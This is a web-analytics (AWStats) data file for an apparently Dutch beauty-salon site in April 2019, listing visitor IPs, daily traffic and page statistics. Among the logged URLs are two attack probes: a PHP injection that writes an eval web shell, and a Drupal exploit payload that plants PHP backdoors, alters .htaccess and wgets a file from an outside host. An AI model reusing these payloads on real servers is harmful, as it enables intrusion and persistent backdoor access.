185.17.149.180 4 4 36250 20190409105156
82.168.204.57 1 19 1560344 20190408181721
163.172.251.241 1 4 40540 20190419233014
104.198.170.219 1 1 3625 20190419064146
5.196.64.109 11 11 37281 20190421004718
84.29.136.162 2 27 307851 20190428144852
82.102.18.148 4 4 36250 20190402024422
52.42.228.3 1 20 252168 20190423145948
165.227.218.28 1 2 37384 20190424202026
138.197.111.51 1 2 37384 20190412232306
95.96.225.85 0 1 73429 
34.222.223.29 1 20 252168 20190418123723
194.67.223.213 19 19 5472 20190429104328
77.164.49.64 4 59 4691798 20190412143225
52.11.161.147 1 20 252168 20190425162530
207.189.0.73 6 6 54559 20190428022833
180.163.220.5 1 12 180077 20190403091509
94.198.159.216 2 2 6799 20190404010250
85.148.197.214 1 19 1560342 20190402112335
93.94.226.8 2 2 18724 20190408125154
38.100.21.68 9 11 95236 20190410173557
34.218.232.17 1 20 252168 20190404132644
31.13.115.8 1 13 232980 20190404153202
54.218.65.186 1 20 252168 20190426123541
52.37.235.207 1 1 9306 20190420064146
54.183.240.172 1 4 40623 20190428073556
165.227.33.127 3 3 10818 20190403210709
185.130.184.209 6 6 54375 20190413045207
66.249.81.230 1 11 1359341 20190414153225
185.217.71.135 3 3 27450 20190420054918
185.153.196.157 2 2 18724 20190406192716
54.202.94.165 1 1 3662 20190412133904
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 30
20190401 84 220 4960013 45
20190402 55 261 8829242 34
20190403 50 216 2443917 45
20190404 57 331 3805735 40
20190405 92 252 3813549 39
20190406 58 202 4600687 44
20190407 50 190 7288094 47
20190408 87 183 4411164 39
20190409 57 267 5566955 42
20190410 79 343 7792248 51
20190411 36 91 4784092 32
20190412 56 218 8987148 37
20190413 38 116 2740677 29
20190414 47 148 4329312 37
20190415 82 281 7205106 45
20190416 52 211 7621366 37
20190417 64 260 4939646 36
20190418 61 168 3039970 37
20190419 38 152 5572949 35
20190420 58 154 3065814 33
20190421 30 105 2402614 18
20190422 65 160 1592122 47
20190423 34 132 2697651 33
20190424 42 121 1312680 36
20190425 81 194 3368260 43
20190426 40 178 3157354 33
20190427 39 154 3172672 30
20190428 90 286 7124772 43
20190429 65 165 2841467 41
20190430 32 33 194201 23
END_DAY

# Session range - Number of visits
BEGIN_SESSION 5
30s-2mn 20
5mn-15mn 3
15mn-30mn 7
0s-30s 1088
2mn-5mn 13
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 10 first Pages must be first (order not required for others)
BEGIN_SIDER 39
/ 936 2173315 878 821
/contact 168 1318741 119 9
/index?bedankt=%27true%27 134 1240329 0 132
/mobiel 87 717835 64 71
/behandeling 40 148347 2 5
/links 33 276164 28 28
/schoonheidsspecialist 31 128373 1 6
/specials 26 83694 0 2
/producten 26 107217 5 2
/index 24 107530 1 2
/medicinaleinwrijving 5 25971 0 0
/orange-flower-divine 13 48419 2 2
/cadeaubon 17 50180 0 2
/?fbclid=iwar00umscem-n7enwnu44t-qnmeem3jen_-g2bnkyb5xsof3rhbzgifzg88o 1 3662 1 1
/voorwaarden 6 21049 1 1
/orange-flower-mama 6 24345 0 0
/google6d31d98a5d80c00b.html 1 351 1 1
/contraindicaties 9 39171 3 5
/harsen-deelbehandelingen 6 26274 0 2
/index?bedankt='true' 1 3625 0 1
/?fbclid=iwar0qya8408yccoyjzvjdkmh2vp78epol0ht-79wlbamfkchkcjlntwu53dc 1 3662 1 0
/?1=%40ini_set%28%22display_errors%22%2c%220%22%29%3b%40set_time_limit%280%29%3b%40set_magic_quotes_runtime%280%29%3becho%20%27-%3e%7c%27%3bfile_put_contents%28%24_server%5b%27document_root%27%5d.%27/webconfig.txt.php%27%2cbase64_decode%28%27pd9wahagzxzhbcgkx1bpu1rbmv0poz8%2b%27%29%29%3becho%20%27%7c%3c-%27%3b 6 56208 6 4
/sitemap.xml 3 4761 2 1
/?fbclid=iwar3pv4icz5pfcinzw8gkdpy0-sa0l2esa4nsr68u-4v6okudrpav44khv6a 1 3662 1 1
/orange-flower-antistress 7 24940 1 2
/praktijk 22 91673 1 5
/?fbclid=iwar2in7-stctauwrlhej8lhpcbsfjbelnyjjaekkxmvdope-bd4n3e_johr8 1 3662 1 1
/effectenmassage 7 34953 3 1
/?fbclid=iwar3gg-htjpfjognktbihj9h8erppvv7jgxhqv4epm8fvf2vcoai42ocyl28 1 3662 1 1
/?q=user%2fpassword&name%5b%23post_render%5d%5b%5d=passthru&name%5b%23type%5d=markup&name%5b%23markup%5d=echo+%27vuln%21%21+patch+it+now%21%27+%3e+vuln.htm%3b+echo+%27vuln%21%21%3c%3fphp+%40eval%28%24_post%5b%27pass%27%5d%29+%3f%3e%27%3e+sites%2fdefault%2ffiles%2fvuln.php%3b+echo+%27vuln%21%21%3c%3fphp+%40eval%28%24_post%5b%27pass%27%5d%29+%3f%3e%27%3e+vuln.php%3b+cd+sites%2fdefault%2ffiles%2f%3b+echo+%27addtype+application%2fx-httpd-php+.jpg%27+%3e+.htaccess%3b+wget+%27http%3a%2f%2f40k.waszmann.de%2fdeutsch%2fimages%2fup.php%27 4 14648 2 4
/orange-flower-basic 16 51730 2 3
/massage 10 41590 1 4
/?fbclid=iwar0fu7e0cbve2iadfgszqjbwzxdaybu8y43uof9pocuj9drlw_jkd6pc46c 1 3662 1 1
/sitemap 20 92773 1 3
/arrangement 23 80930 0 2
/orange-flower-royal 13 46989 0 1
/?fbclid=iwar3rou4jjcmkzzr6huup6qscz7r3xype6lind1f67t1-ye1vvc_dw3w7hza 1 3662 1 1
/orange-flower-antiage 6 22041 0 1
/orange-flower-purify 6 21475 0 2
END_SIDER
